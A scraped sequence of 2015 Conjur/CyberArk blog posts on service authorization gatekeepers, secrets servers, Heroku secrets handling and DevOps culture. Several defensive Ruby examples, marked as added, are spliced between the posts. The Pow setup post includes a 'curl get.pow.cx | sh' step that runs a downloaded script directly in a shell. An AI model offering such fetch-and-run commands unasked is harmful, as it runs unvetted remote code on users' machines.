  4. Conjur receives the authorization request, and verifies the token to obtain the client identity. Then, Conjur checks whether the client identity has the necessary privilege on the gatekeeper resource.

  5. Conjur responds with an HTTP status code indicating if the request should be allowed.

  6. The gatekeeper caches this response, so that the authorization cost does not have to be repeated for each client request.

  7. If Conjur allows the request, then it is submitted to the protected Heroku application or service. The request is processed, and the response goes back to the client.

Example

Let’s see the gatekeeper in action. Conjur’s release-bot is a webservice which deploys Conjur artifacts to destinations like RubyGems, NPM, and Heroku. release-bot runs in Heroku, and access to it is controlled by the Gatekeeper buildpack. It has a simple REST interface:

  • POST /npm/releases – release to NPM

  • POST /rubygems/releases – release to RubyGems

  • DELETE /rubygems/releases/:name – yank a Ruby gem

  • POST /heroku/releases – push a Heroku app

A Conjur webservice resource called production/release-bot-2.0 is used to protect access to the release-bot. In accordance with the Gatekeeper, POST methods require create privilege on the resource, and the DELETE method requires update privilege. The webservice resource, along with the client roles, are defined in this policy file. The policy file is loaded using Conjur tools, once for each environment (development, stage, production).
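Here is the seven-step flow above reduced to runnable Ruby, as an added example rather than the buildpack’s own code: a stand-in authorization service that verifies constructed HMAC-signed bearer tokens (not Conjur’s token format) against a constructed grant table, and a gatekeeper that maps HTTP methods to privileges (POST to create, DELETE to update, as release-bot does), asks the service once, caches the decision for a bounded TTL, and only then passes the request upstream. All identities, tokens, grants and the release-bot stand-in are constructed.

```ruby
require 'openssl'
require 'digest'

# Constant-time comparison so token verification does not leak timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Stand-in for the Conjur authorization service (constructed, not Conjur's API).
# A token is "identity:hex-hmac", signed with a key only this service holds.
class AuthzService
  attr_reader :calls

  def initialize(signing_key, grants)
    @key = signing_key
    @grants = grants   # { resource => { identity => [privilege, ...] } }
    @calls = 0         # round-trips made, to show the gatekeeper's cache working
  end

  def issue_token(identity)
    "#{identity}:#{OpenSSL::HMAC.hexdigest('SHA256', @key, identity)}"
  end

  # 401: token cannot be verified; 403: identity lacks the privilege; 200: allowed.
  def check(token, resource, privilege)
    @calls += 1
    identity, mac = token.split(':', 2)
    return 401 if identity.nil? || mac.nil?
    return 401 unless secure_equal?(mac, OpenSSL::HMAC.hexdigest('SHA256', @key, identity))
    (@grants.dig(resource, identity) || []).include?(privilege) ? 200 : 403
  end
end

# The gatekeeper sits in front of the protected service.
class Gatekeeper
  METHOD_PRIVILEGE = {
    'GET' => 'read', 'POST' => 'create', 'PUT' => 'update', 'DELETE' => 'update'
  }.freeze

  def initialize(authz, resource, upstream, cache_ttl: 60)
    @authz = authz
    @resource = resource      # the Conjur resource this gatekeeper protects
    @upstream = upstream      # callable(request) -> [status, body]
    @ttl = cache_ttl          # must not exceed the token lifetime
    @cache = {}               # [token digest, privilege] => [status, expires_at]
  end

  # request = { method:, path:, headers: }; returns [status, body].
  def handle(request, now: Time.now)
    privilege = METHOD_PRIVILEGE[request[:method]]
    return [405, 'method not allowed'] unless privilege
    token = (request[:headers] || {})['Authorization'].to_s.sub(/\ABearer\s+/i, '')
    return [401, 'missing token'] if token.empty?
    status = authorize(token, privilege, now)
    return [status, 'denied by gatekeeper'] unless status == 200   # fail closed
    @upstream.call(request)
  end

  private

  def authorize(token, privilege, now)
    key = [Digest::SHA256.hexdigest(token), privilege]   # cache a digest, not the token
    status, expires_at = @cache[key]
    return status if status && expires_at > now
    status = @authz.check(token, @resource, privilege)
    @cache[key] = [status, now + @ttl]
    status
  end
end

# Constructed deployment: a publisher role that may release but not yank,
# and a developer who may also yank, protecting the release-bot stand-in.
def build_demo
  authz = AuthzService.new('constructed-signing-key', {
    'production/release-bot-2.0' => {
      'host/jenkins/master' => %w[read create],
      'user/alice'          => %w[read create update]
    }
  })
  upstream = ->(req) { [200, "release-bot handled #{req[:method]} #{req[:path]}"] }
  [Gatekeeper.new(authz, 'production/release-bot-2.0', upstream, cache_ttl: 60), authz]
end

if $PROGRAM_NAME == __FILE__
  gatekeeper, authz = build_demo
  jenkins = authz.issue_token('host/jenkins/master')
  p gatekeeper.handle({ method: 'POST', path: '/rubygems/releases',
                        headers: { 'Authorization' => "Bearer #{jenkins}" } })
  p gatekeeper.handle({ method: 'DELETE', path: '/rubygems/releases/foo',
                        headers: { 'Authorization' => "Bearer #{jenkins}" } })
end
```

Two design points carry over to a real gatekeeper: every non-200 answer from the authorization service fails closed, and the decision cache is bounded by a TTL that must be shorter than the token’s lifetime, otherwise a revoked or expired token keeps working until the cache entry ages out.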

The Jenkins server is enabled to perform code pushes. This is a simple process:

  1. The Jenkins layer is granted the role production/release-bot-2.0/publisher. This gives Jenkins hosts (both master and slaves) permission to read and create releases.

  2. Jenkins jobs are created to perform releases; for example release-rubygems. This job operates by authenticating with Conjur (using the Jenkins host credentials), then POST-ing to the release-bot.


  3. A Jenkins promotion step is created on appropriate projects, such as the Conjur CLI for Ruby, which invokes the release-rubygems job.


As a result, there’s a clean separation of duties:

  • Jenkins performs build and test, and creates artifacts

  • release-bot deploys artifacts into production

In addition, the Conjur development team has permission to invoke release-bot to perform any necessary manual administration of releases; for example, yanking a Gem, or re-invoking a push which has failed for some reason.

Neither Jenkins nor the Conjur development team has direct access to the deployment credentials, such as the RubyGems and Heroku API keys; yet both can easily and securely perform the release functions.

Summary

At Conjur, we are working hard with our customers and the broader DevOps community to learn how to make tools and processes that give developers, operations, and security teams the power that they need to move fast and make decisions, without sacrificing security or transparency. Here’s how the Conjur gatekeeper feels to each member of the DevOps + continuous delivery team.

For developers, the gatekeeper enables them to remove HTTP(S) authentication from their application. This is great for development, because development servers can be built and tested against each other with security disabled. Also, because each app has its own built-in gatekeeper, there’s no single point of failure “global authentication server” which might limit the scalability or flexibility of the deployed application.

Security people get a uniform traffic authorization architecture that applies across the entire system. They know that each application will be protected in the same way, and they don’t need to vet the authentication and authorization systems that would otherwise be built into many different projects.

It’s also a nice solution for operations, because the build machine is going to generate application images which, although they don’t have built-in security, can be deployed to production without any modification.

Compliance people gain the assurance that communication between services is individually authorized. The system is no longer a big blob of services communicating freely between each other; it’s a defined, controlled set of interactions, each of which are independently authorized and audited. Furthermore, because Conjur provides role-based access control and permissions reporting, they can determine at any time which people and code have specific privileged access.

 

]]>
Difficult Conversations and DevOps https://www.cyberark.com/blog/difficult-conversations-and-devops/ Wed, 06 May 2015 16:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/difficult-conversations-and-devops/  

Successful DevOps has as much to do with culture as it does with the specific tools used to continuously deliver code. While tools are easy to learn about, evaluate, and select, culture is a much more difficult beast to quantify. It is easy to say you are working to improve internal communication and collaboration but it is another thing to actually do it – especially when part of that necessary communication comes in the form of difficult conversations. Based on the framework from the book ‘Difficult Conversations’, the goal of this blog post is to give you some structure as you tackle these communication challenges on your quest for DevOps supremacy.


As suggested in the book, every difficult conversation is essentially three different conversations: one that is spoken and two that are unspoken. The spoken conversation is referred to as the ‘What Happened’ conversation and will be the focus of this blog post.

In the ‘What Happened’ conversation people tend to argue over who’s right, place blame, and make assumptions about each side’s intentions. I’m sure you’ve been in a meeting where a post-mortem is being conducted and instead of going through a ‘5 Whys’ or taking a deeper dive into the project, the conversation jumps into a finger pointing session. So, why does this happen so frequently? Human nature? Lack of structure? Yes on both counts. You can’t ignore some facts about how we humans come to create our inferences:

  • We often have access to different data than the others in the conversation.
  • We often select based on our own interests, assumptions, and biases.
  • We often interpret based on our own past experiences and implicit rules.
  • As a result we often come to different conclusions.

We see this chain of events occur more often than not in a developing DevOps environment.  With stakeholders from Dev, Ops, Security, HR, Finance, and the C-Suite involved there are a lot of agendas, assumptions, and interpretations that can negatively impact an organization’s ability to stay ahead of the competition and improve their internal processes at the same time.

During these difficult conversations we often end up arguing over who’s right and who’s wrong… however, the truth usually lies somewhere in between. So, how do we move away from this vicious cycle and work towards a more helpful habit of solving problems collaboratively? Here are 3 steps that will help you shift the conversation to facts and away from judgments, emotions, interpretations, and expectations.

Shift from Arguing to Inquiring

The first step is to stop blaming and start inquiring.  Instead of snap judgments, think about the questions you can ask that will get to the heart of the matter, the facts of the situation.  As you can imagine, we are looking for open-ended questions at this stage.  The goal is to be able to define their story as much as you can define yours.  By going through this exercise via open-ended questions you will better discover each party’s perceptions and interpretations of what ‘the truth’ is.

Here are some open-ended questions that should help facilitate this step in the process:

  • Would you tell me more about _______ ?
  • I’m not sure I understand, can you give me an example?
  • When you say ________, what do you mean?
  • Why is that important to you?
  • What kind of information do you need in order to move forward?
  • How are you feeling about all of this?

These types of questions will get you started, but beware, blame lurks below most of these discussions.  Blame is a dangerous and sometimes catastrophic variable that can plague organizations for long periods of time. It causes people to cover up information and mistakes, it permanently damages relationships, and it allows problems to persist for far too long because they aren’t accurately diagnosed.  The next step of this process sets its sights on blame and, once again, works to shift the conversation.

Shift from Blame to Contribution

To avoid the ‘blame game’ it is vital to move all involved parties towards actively contributing to a solution.  Contribution assumes a few things: everyone can contribute something to the solution, our purpose is to fix a problem, not assign blame, and by understanding contributions we will learn what to do differently going forward.

Contributions can come in all forms and should be heavily focused on facts not perceptions.  In a typical DevOps environment there can be a lot of innate perceptions that will work against contribution.  Devs are perceived not to plan or do due diligence, Ops are perceived to move too slowly and are usually a bottleneck, and security is perceived as too ‘outside of the process’ to be viewed as a primary stakeholder.  By re-framing the conversation around contribution and business goals, you increase the probability of aligning the team and moving the project forward.

Separate Intentions from Impact

Intentions can be a tricky matter. It is human nature to make up attributions about other people’s intentions based on how they could potentially impact us. If that isn’t dangerous enough, while making these attributions, we often assume the worst, which can easily put two parties on opposite sides of the table during a difficult conversation. What most of us fail to realize is that, although others’ intentions are usually invisible to us, they are often much closer to our own intentions than we realize. Therefore, it is imperative that we begin to separate intentions from impact.

In this framework there are 3 steps to successfully separating intentions from impact:

  1. Observe Your Own Attributions:  What data is this based on?
  2. Understand that Intentions are Complex: People regularly act with good, bad, mixed, or no intentions at all.
  3. Don’t Assume Intentions: This is key but in order to avoid this trap you need to make sure you communicate potential intentions and share how they could directly impact you.

For DevOps to truly create trust between human and technical interactions there is a need for difficult conversations.  The ‘What Happened’ conversation will span across all departmental lines and be a true litmus test to see if your overall corporate culture can sustain a DevOps mindset and action plan.  As in any system, this framework is only as effective as its weakest link, so by having leadership not only buy-in, but also effectively communicate in this fashion, you dramatically increase your chances of sustainable success.

So the next time you find yourself in a ‘What Happened’ type of meeting or conversation, remember to ask yourself these important questions:

  • What is my story?  What is their story?
  • What have we each contributed to this situation?
  • How can we fix things going forward?
  • What assumptions am I making about their intentions?
  • What is the impact on me?
  • How can I communicate this to them in an effective way?

This type of communication is contagious within an organization. Start today and master these essential, yet difficult, conversations.

If you’re interested in learning more about the cultural aspect of DevOps please click on the link below and answer a few questions.  Your feedback will allow us to continue to create helpful content for you in the future.

 

]]>
Privilege Was Everywhere at the RSA Conference https://www.cyberark.com/blog/privilege-was-everywhere-at-the-rsa-conference/ Thu, 30 Apr 2015 18:14:15 +0000 https://www.cyberark.com/blog//

We’re back from a whirlwind week at the RSA Conference – and what a week it was! This year broke attendance records as security pros from around the globe traveled to San Francisco to listen to more than 700 speakers in more than 400 sessions on a wide range of topics from today’s dramatic infosec talent shortage to the critical need to keep our kids safer online to our own popular session on “Privileged Account Exploits – the Point of No Return.” Now that we’re back – and in between catching up on email (and sleep!) – we reflect on some of this year’s highlights:

Numerous sessions, panels and one-on-one conversations throughout the conference underscored the hard, cold truth that attackers will find a way to get inside your organization, no matter how you try to stop them. As the focus has shifted to the battle within the network, many security researchers, practitioners and vendors alike have observed a common attack link: privileged account exploits. So while you don’t know who and you don’t know when, you do know what motivated attackers are after. This year, we saw a surge of attendees seeking innovative ways to break the attack chain by defending what really matters. And from the moment the show floor opened to the second it closed, the CyberArk booth was jam-packed with people participating in interactive demonstrations of our Privileged Account Security Solution to learn how to better protect against, detect and respond to attacks, before they strike vital systems and jeopardize business.

Privileged accounts grant extensive control over sensitive data and IT systems. They’re pervasive in every organization, they’re often overlooked and they can be powerful weapons in the wrong hands. Recent, highly publicized pass-the-hash attacks targeting privileged accounts from Anunak/Carbanak to Sands show how these exploits have grown increasingly sophisticated. So it’s no wonder our RSA session, “Privileged Account Exploits – the Point of No Return,” delivered by Adam Bosnian and Yair Sade was so crowded – we couldn’t even get into the room to take a picture! In addition to exploring a series of real-world attack scenarios and pinpointing the common attack denominator, attendees walked away with actionable steps for stopping advanced threats by blocking the privileged account pathway.

Privileged account credential security – or lack thereof – was a highly prevalent discussion driver throughout the week. In fact, CSO’s Steve Ragan pointed to insecure credentials as one of the top three themes for the whole show. He cites an RSA talk that revealed millions of point-of-sale (POS) systems used around the world are vulnerable today because they are protected by the same default password that hasn’t been changed for 20 years. Making matters worse, many of these vendors’ customers have never changed this password on their POS systems once they have shipped. This revelation is just one example of how off-the-shelf software has exacerbated the already complex privileged account challenge for organizations. Edward Snowden may have said it best when he remarked to HBO’s John Oliver earlier this month in an interview from Russia, “Bad passwords are one of the easiest ways to compromise a system. For someone who has a very common, eight-character password, it can literally take less than a second for a computer to go through the possibilities and pull that password out.”

And last but not least, the accessory du jour at this year’s RSA Conference was the blue CyberArk “Privilege Is Everywhere” pin, which helped illustrate the pervasiveness of privileged accounts throughout the enterprise – from a network’s infrastructure to applications and into the cloud – and reflect a top-of-mind challenge for many RSA attendees this year.

Thanks to our customers, colleagues and peers for another fantastic RSA show. See you next year!

]]>
What is a DevOps Secrets Server? https://www.cyberark.com/blog/what-is-a-devops-secrets-server/ Tue, 28 Apr 2015 15:12:00 +0000 https://cyberarkvx2.wpengine.com/blog/what-is-a-devops-secrets-server/  

There was a lot of interest in Square’s announcement of the open sourcing of their “system for managing and distributing secrets” called Keywhiz. The discussion on Hacker News revealed at least two other open source projects – Sneaker and CredStash – that also provided similar types of capabilities by leveraging some of the built-in capabilities of the AWS platform.

The emergence of these projects and the strong follow-on interest is validation of the need for a new type of technology called a “DevOps Secrets Server”.  In case you missed it, Conjur’s CEO Elizabeth Lawler spoke about this in her talk at RSA. This is part of what she called SecDevOps 2.0 – the formalization of proper security controls for DevOps workflows and the applications they deliver.

So what is a DevOps Secrets Server?  Here are some key points:

End to end encryption

It almost goes without saying that secrets must be encrypted from end-to-end. For example:

  • The secrets should be encrypted when “at rest” in the secrets server
  • Each secret should be encrypted with a unique key, which is itself encrypted by a master key (or set of master keys)
  • Cryptography should be professionally audited, and ideally open-sourced.
  • Secrets should be encrypted in transit, using e.g. TLS
  • SSL verification must be ON! Never SSL_VERIFY_NONE, not even in development systems.
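The second bullet, a unique key per secret wrapped by a master key, is envelope encryption. Here it is as an added Ruby example (not Conjur’s or slosilo’s code) using AES-256-GCM from the standard OpenSSL binding: each secret is encrypted under its own random data key, the data key is in turn encrypted under the master key, only the wrapped key and ciphertext are stored, and master-key rotation re-wraps the data keys without touching the secrets. The secret ids and values are constructed; in a real deployment the master key would come from an HSM or KMS rather than a variable.

```ruby
require 'openssl'
require 'securerandom'

# Envelope encryption for a secrets store. Each secret gets its own random
# data-encryption key (DEK); the DEK is wrapped by the master key (KEK).
# Storage holds only wrapped DEKs and ciphertexts, so a copy of the storage
# layer without the master key yields nothing.
class EnvelopeVault
  CIPHER = 'aes-256-gcm'

  def initialize(master_key)
    raise ArgumentError, 'master key must be 32 bytes' unless master_key.bytesize == 32
    @master_key = master_key
    @records = {}   # id => { wrapped_dek:, dek_iv:, dek_tag:, iv:, ciphertext:, tag: }
  end

  def store(id, plaintext)
    raise ArgumentError, 'secret value must not be empty' if plaintext.empty?
    dek = SecureRandom.random_bytes(32)                   # unique key per secret
    iv, ciphertext, tag = encrypt(dek, plaintext, id)     # id bound as AAD
    dek_iv, wrapped_dek, dek_tag = encrypt(@master_key, dek, id)
    @records[id] = { wrapped_dek: wrapped_dek, dek_iv: dek_iv, dek_tag: dek_tag,
                     iv: iv, ciphertext: ciphertext, tag: tag }
    nil
  end

  def fetch(id)
    r = @records.fetch(id) { raise KeyError, "no such secret: #{id}" }
    dek = decrypt(@master_key, r[:dek_iv], r[:wrapped_dek], r[:dek_tag], id)
    decrypt(dek, r[:iv], r[:ciphertext], r[:tag], id)
  end

  # Rotation: unwrap every DEK with the old master key and re-wrap it with the
  # new one. The secret ciphertexts themselves are not touched.
  def rotate_master_key!(new_master_key)
    raise ArgumentError, 'master key must be 32 bytes' unless new_master_key.bytesize == 32
    @records.each do |id, r|
      dek = decrypt(@master_key, r[:dek_iv], r[:wrapped_dek], r[:dek_tag], id)
      r[:dek_iv], r[:wrapped_dek], r[:dek_tag] = encrypt(new_master_key, dek, id)
    end
    @master_key = new_master_key
    nil
  end

  # What persistence would see for one secret: no plaintext, no unwrapped key.
  def stored_record(id)
    @records.fetch(id).transform_values(&:dup)
  end

  # Restore a record from persistence (e.g. after a restart).
  def load_record(id, record)
    @records[id] = record.transform_values(&:dup)
    nil
  end

  private

  def encrypt(key, data, aad)
    c = OpenSSL::Cipher.new(CIPHER).encrypt
    c.key = key
    iv = c.random_iv            # fresh 96-bit nonce; never reuse with the same key
    c.auth_data = aad
    ct = c.update(data) + c.final
    [iv, ct, c.auth_tag]
  end

  def decrypt(key, iv, ct, tag, aad)
    c = OpenSSL::Cipher.new(CIPHER).decrypt
    c.key = key
    c.iv = iv
    c.auth_tag = tag
    c.auth_data = aad
    c.update(ct) + c.final      # raises OpenSSL::Cipher::CipherError if tampered
  end
end

if $PROGRAM_NAME == __FILE__
  vault = EnvelopeVault.new(SecureRandom.random_bytes(32))   # constructed master key
  vault.store('prod/db/password', 'constructed-db-password')
  puts vault.fetch('prod/db/password')
  vault.rotate_master_key!(SecureRandom.random_bytes(32))
  puts vault.fetch('prod/db/password')                       # still readable
end
```

Binding the secret id as GCM associated data means a record moved from one id to another, or a ciphertext edited in storage, fails authentication instead of decrypting to something plausible; that is the property that turns "encrypted at rest" into a control rather than a checkbox.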

RBAC for people, machines, and code

The access to the secrets in the server needs to be governed by a robust policy model.  This model must support all the identities that are common in the world of DevOps – people, servers, VMs, containers, and web services. DevOps, by nature, is dynamic. Machines, containers, and services are constantly being created and destroyed. This is commonly referred to as treating servers like cattle. Once the policies have been defined and agreed upon, both the DevOps and Security teams can be confident that the workflows are following security best practices like least privilege, defense in depth, and separation of duties.

In globally distributed, dynamic systems where machines are automatically provisioned and destroyed by code, simple authentication mechanisms like OAuth or API Keys work better than traditional IT server management approaches such as client certificates and Kerberos. And along with the identity of each instance comes a role, which gives each machine privileges within an authorization policy. This type of automated “host factory” eliminates the need for manual intervention by information security staff in the DevOps workflow.

The model must also support RBAC for human users. For example, DevOps teams are often loaded with contractors; in many regulated environments contractor access to systems needs to be restricted. This type of model is required to support security best practices such as separation of duties and least privilege.

Self-Auditing

The complete lifecycle of the objects managed by the DevOps Secrets Server must be audited.  All access to secrets, whether successful or not, must be audited as well.  Without proper auditing and other robust controls like strong encryption and the aforementioned RBAC, the server is just serving up name value pairs.  It’s good for a shared data layer but it’s not a secrets server.

Fully programmable with fine granularity

Since many of the actors in the workflow are silicon-based (machines), and not carbon-based (people), the DevOps secrets server needs to have a comprehensive set of APIs. The APIs must be protected by the same RBAC model, and all API calls must be audited as well. GUIs are important for reporting, alerting, and visualizing the policy model, but not as a primary means of interacting with the system. Self-service and other business-as-usual activities can be easily built on the APIs.

Highly available across any cloud, hybrid, and global architecture

Security systems are mission critical and need to be highly available and support zero-downtime upgrades. This requires an architecture that is purpose-built for the types of infrastructures that DevOps applications leverage or plan to leverage in the future. They need to work with any cloud (public/hybrid) and across clouds. The scaling, fault-tolerance, and failure recovery features should use cloud-native primitives like autoscaling and containerized cluster deployment.

This is essential because the DevOps secrets server is going to be run by the same DevOps team as the rest of the infrastructure. The more integrated the secrets server is with the rest of the environment, the more seamless the experience. Increased integration also means that security can flow with, not against, the tide.

About Conjur

Conjur is a company dedicated to addressing the security challenges of DevOps.  Secrets management is one such use case that the Conjur platform addresses.  The DevOps world is complicated and constantly changing, therefore, various solutions are emerging.  Conjur is already deployed by DevOps leaders like Netflix, Rally Software, and Novartis.  Conjur is ready today.  Are you?

A note on cryptography in Conjur

All secrets managed by Conjur are encrypted and decrypted by the open-source library slosilo. Slosilo has been professionally reviewed by a 3rd-party auditor. The crypto audit report is available on request.

Secure Developer Access to Hosted Services via Conjur and Pow https://www.cyberark.com/blog/secure-developer-access-to-hosted-services-via-conjur-and-pow/ Mon, 27 Apr 2015 16:12:00 +0000 https://cyberarkvx2.wpengine.com/blog/secure-developer-access-to-hosted-services-via-conjur-and-pow/

Conjur’s HTTP service authorization capability, aka Software Defined Firewall (SDF), is a high performance and highly available way to protect services and micro-services against unauthorized access. The SDF consists of two parts: the forwarder, and the gatekeeper. The forwarder runs on the client end of the transaction. All outbound traffic from the client is sent through the forwarder, which:

  • Authenticates the client with Conjur, obtaining a Conjur auth token

  • Puts the auth token on the outbound request, in the HTTP Authorization header

The gatekeeper runs on the server side. It’s a lightweight reverse proxy which intercepts each inbound request, verifies authenticity of the auth token, and verifies the client’s access privilege using the Conjur web service.
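As an added illustration (not Conjur's code), here is the forwarder/gatekeeper exchange modelled in Ruby with Rack-style callables (env hash in, [status, headers, body] out), with a constructed stand-in for the Conjur authn/authz service. The token encoding, the Authorization: Token token="..." header scheme, the token lifetime and all identities and keys are assumptions made for this example:

```ruby
require 'base64'
require 'json'

# Constructed stand-in for the Conjur authn/authz web service (not the real API).
class FakeConjur
  TOKEN_MAX_AGE = 480 # seconds; older tokens are rejected (assumed lifetime)

  attr_reader :audit

  def initialize(api_keys:, privileges:)
    @api_keys = api_keys       # login => API key
    @privileges = privileges   # [login, privilege, resource] triples
    @audit = []                # every privilege check, allowed or denied
  end

  # authn: exchange a login and API key for a short-lived token.
  def authenticate(login, api_key)
    raise ArgumentError, 'bad credentials' unless @api_keys[login] == api_key
    Base64.strict_encode64(JSON.generate('data' => login, 'timestamp' => Time.now.to_i))
  end

  # Return the login a token carries, or nil if the token is malformed or stale.
  def verify(token, now: Time.now.to_i)
    payload = JSON.parse(Base64.strict_decode64(token))
    return nil unless payload.is_a?(Hash) && payload['timestamp'].is_a?(Integer)
    return nil if now - payload['timestamp'] > TOKEN_MAX_AGE
    payload['data']
  rescue ArgumentError, JSON::ParserError
    nil
  end

  # authz: does the login hold the privilege on the resource? Every check is audited.
  def permitted?(login, privilege, resource)
    allowed = @privileges.include?([login, privilege, resource])
    @audit << { login: login, privilege: privilege, resource: resource, allowed: allowed }
    allowed
  end
end

# Gatekeeper: the server-side reverse proxy in front of the protected service.
class Gatekeeper
  HEADER = %r{\AToken token="([A-Za-z0-9+/=]+)"\z}

  def initialize(app, conjur, resource:, privilege: 'execute')
    @app, @conjur, @resource, @privilege = app, conjur, resource, privilege
  end

  def call(env)
    match = HEADER.match(env['HTTP_AUTHORIZATION'].to_s)
    login = match && @conjur.verify(match[1])
    return [401, { 'Content-Type' => 'text/plain' }, ['Unauthorized']] unless login
    return [403, { 'Content-Type' => 'text/plain' }, ['Forbidden']] unless @conjur.permitted?(login, @privilege, @resource)

    @app.call(env)
  end
end

# Forwarder: the client-side proxy that authenticates and stamps every outbound request.
class Forwarder
  def initialize(upstream, conjur, login:, api_key:)
    @upstream, @conjur, @login, @api_key = upstream, conjur, login, api_key
  end

  def call(env)
    token = @conjur.authenticate(@login, @api_key)
    @upstream.call(env.merge('HTTP_AUTHORIZATION' => %(Token token="#{token}")))
  end
end

# Wire a ReleaseBot-like service behind a gatekeeper, with two constructed client identities.
def build_demo
  conjur = FakeConjur.new(
    api_keys: { 'host/dev-laptop' => 'constructed-key-1', 'host/intern-box' => 'constructed-key-2' },
    privileges: [['host/dev-laptop', 'execute', 'webservice:releasebot']]
  )
  service = ->(env) { [200, { 'Content-Type' => 'text/plain' }, ["released via #{env['PATH_INFO']}"]] }
  gatekeeper = Gatekeeper.new(service, conjur, resource: 'webservice:releasebot')
  {
    conjur: conjur,
    gatekeeper: gatekeeper,
    dev: Forwarder.new(gatekeeper, conjur, login: 'host/dev-laptop', api_key: 'constructed-key-1'),
    intern: Forwarder.new(gatekeeper, conjur, login: 'host/intern-box', api_key: 'constructed-key-2')
  }
end

if __FILE__ == $PROGRAM_NAME
  d = build_demo
  req = { 'REQUEST_METHOD' => 'POST', 'PATH_INFO' => '/rubygems/releases' }
  puts d[:gatekeeper].call(req)[0] # 401: no token, like the unauthorized curl in this post
  puts d[:dev].call(req)[0]        # 200: forwarder supplied a valid, privileged token
  puts d[:intern].call(req)[0]     # 403: authenticated, but no execute privilege
end
```

The real forwarder and gatekeeper are separate HTTP proxies; here the forwarder calls the gatekeeper in-process so the whole exchange runs offline.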

The gatekeeper is installed on the server-side in accordance with the server-side hosting architecture. For example, for Heroku apps, the gatekeeper is installed as a custom buildpack. In Docker clusters, the gatekeeper is a Docker container which is outward-facing, and has a Docker “link” to the protected service.

In server-to-server scenarios, the forwarder can also run embedded in the server stack (e.g. Docker cluster). A key aspect of all Conjur technology is our emphasis on consistent workflows through development/stage/production, and uniform access controls for people, machines and code. Therefore, it’s important for developers to have an easy way to run a local forwarder and thereby access SDF-protected services.

After brainstorming and experimenting with some different approaches, we’ve discovered pow.cx, “a zero-config Rack server for Mac OS X”. It’s a self-contained web server that automatically launches Rack-based applications, and assigns them locally resolvable DNS names like “myapp.dev”.

Let’s take a look at the entire workflow: setting up Pow, using it to run a Conjur forwarder, and invoking a protected web service using cURL.

The Conjur ReleaseBot is a good example of a protected web service. It’s a Sinatra app which runs in Heroku and performs Conjur code pushes to RubyGems, NPM, and Heroku. It has a simple REST interface:

  • POST /npm/releases release to NPM
  • POST /rubygems/releases release to RubyGems
  • DELETE /rubygems/releases/:name yank a Ruby gem
  • POST /heroku/releases push a Heroku app

To access this protected web service from a developer machine (on MacOS), the first step is to install Pow:

    $ curl get.pow.cx | sh

Next, create a Rack application which runs a forwarder. Conjur provides a forwarder implementation called conjur-asset-proxy which runs as a plugin to the Conjur CLI.

A simple Gemfile installs the dependency libraries:

    source "https://rubygems.org"

    gem 'conjur-cli'
    gem 'conjur-asset-proxy'

A config.ru (aka “rackup”) defines the Rack application, which builds a Conjur proxy to the remote service:

    # `api` is the authenticated Conjur API client set up earlier in the full config.ru
    proxy = Conjur::Proxy.new("https://releasebot-conjur.herokuapp.com", api)
    proxy.configure
    run proxy

(This is just a snippet; you can view a full example here.)

Rack applications are mounted into Pow via symlinks. Pow picks these up automatically and deploys them as Rack applications. Navigate to the ~/.pow directory and create a symlink to the Rack application:

    $ cd ~/.pow
    $ ln -s ~/source/sdf-forwarders/releasebot .

Pow logs are easy to find and read in the MacOS Console.

When everything’s up and all looks well in the log, accessing the service is a simple matter of a cURL command (or, for web apps, opening http://appname.dev in your browser).

So, how is ReleaseBot used to publish a new Ruby gem version of the Conjur CLI? First, here’s what it looks like without any authorization:

    $ curl -i -X POST https://releasebot-conjur.herokuapp.com/rubygems/releases \
        --data "name=conjur-cli"

HTTP/1.1 401 Unauthorized
Server: Cowboy
Date: Fri, 24 Apr 2015 19:56:03 GMT
Connection: keep-alive
Content-Type: text/html;charset=utf-8
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 0
Via: 1.1 vegur

By changing the base URL to http://releasebot.dev, which is running automatically under Pow, we can perform the Gem release without having to handle authorization ourselves:

    $ curl -X POST releasebot.dev/rubygems/releases --data "name=conjur-cli"
    Gem version 4.21.1 released

This is just as convenient as using completely insecure services! That’s the workflow everyone is looking for, without the risk. This is security at speed, via Conjur.

 

Securing Heroku Apps https://www.cyberark.com/blog/securing-heroku-apps/ Thu, 23 Apr 2015 20:51:00 +0000 https://cyberarkvx2.wpengine.com/blog/securing-heroku-apps/

Heroku is great. We use it internally at Conjur to host smaller apps, like our Demo Factory. This app allows you to get a Conjur demo by filling out a form. This little app has a lot of power – it needs credentials to access many different services. This is where it gets complicated – how do we give the app access to these credentials in a safe and dev-friendly way?

In this post I will go into detail about how the Demo Factory works and what systems it needs access to, the Heroku-recommended approach to give access and its problems, and finally a friendlier approach using Conjur.

Demo Factory – how it works and what it needs

This is what happens when you request a Conjur demo:

  1. an EC2 instance spins up
  2. it is provisioned with Chef
  3. in ~10 minutes you receive an email with instructions on how to access your demo environment.

These are the credentials the app needs to be able to access to do its job:

  • AWS keys to create and destroy instances
  • Sentry DSN to capture any exceptions that may occur
  • Hipchat API token to post messages to a room when demos launch
  • Hubspot API token to create contacts
  • Mandrill API key to send emails
  • Keen API key to capture metrics for later aggregation

The Heroku Way

In accordance with the Twelve-Factor App manifesto, Heroku apps receive their configuration via environment variables, “config vars” in Heroku parlance. You set your config vars via the Heroku CLI or UI and access them as environment variables in your application.

When developing an app that requires secrets, you create a .env file and run the app via foreman. You can also use the heroku-config plugin to pull variables from Heroku into your .env file. You add the .env file to the project’s .gitignore file. This is where the workflow starts to unravel.

If any part of your secrets workflow depends on gitignoring files, this should be a red flag.

Why? You now have secrets sitting in plain text on your dev system. If you forget to gitignore that file or your machine is compromised, your secrets are public. We are working so hard in the DevOps community to achieve parity between environments – this lets us catch problems earlier when they’re less expensive. So why should our secrets workflow be different for development, test/CI and production? The way our applications and engineers access secrets should be the same no matter what environment they are in.

Rotating your secrets is a good idea. This should not affect your developer workflows. By gitignoring parts of your application, you’re putting the obligation of keeping secrets up to date on your developers. This is a distraction from what they do to deliver value – shipping features.

Finally, there is no trail of access to secrets in this workflow. Lack of transparency is the number one obstacle to compliance. If you have compliance obligations, the Heroku Way of handling secrets rules out using Heroku. It’s also worth noting that handing the keys to your kingdom to a third party with minimal transparency on how they’re used is not ideal.

The Conjur Way

The Conjur workflow is based on assigning permissions to identities. Users, hosts, third-party platforms; they all have an identity. Our goal here is transparency: which identities have access to which secrets and how are they using them.

